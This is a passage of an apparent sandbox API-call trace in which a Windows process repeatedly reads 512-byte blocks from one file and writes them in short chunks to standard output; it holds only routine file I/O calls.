(_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0115.076] GetFileType (hFile=0x4c) returned 0x1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.076] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.076] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.077] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.077] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, 
lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] GetFileType (hFile=0x4c) returned 0x1 [0115.077] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.077] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: 
lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.078] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.078] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] GetFileType (hFile=0x4c) returned 0x1 [0115.078] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.078] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.079] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.079] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] 
GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.079] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.079] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 
[0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.080] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.080] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, 
nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.080] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.080] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, 
lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.081] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.081] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType 
(hFile=0x4c) returned 0x1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.081] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.081] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.082] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.082] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.082] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec34*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aec84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aec84*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] GetFileType (hFile=0x4c) returned 0x1 [0115.082] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.082] WriteFile (in: hFile=0x4c, lpBuffer=0x2aecd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aecd4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed24*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed24*, 
lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aed74*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aed74*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aedc4*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aedc4*, lpNumberOfBytesWritten=0x2addc8*=0x20, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.083] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2addb4 | out: lpNewFilePointer=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=4) returned 0x54 [0115.083] ReadFile (in: hFile=0x54, lpBuffer=0x2aebe4, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2addd4, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesRead=0x2addd4*=0x200, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] WriteFile (in: hFile=0x4c, lpBuffer=0x2aebe4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2addc8, lpOverlapped=0x0 | out: lpBuffer=0x2aebe4*, lpNumberOfBytesWritten=0x2addc8*=0x50, lpOverlapped=0x0) returned 1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c [0115.083] GetFileType (hFile=0x4c) returned 0x1 [0115.083] _get_osfhandle (_FileHandle=1) returned 0x4c 
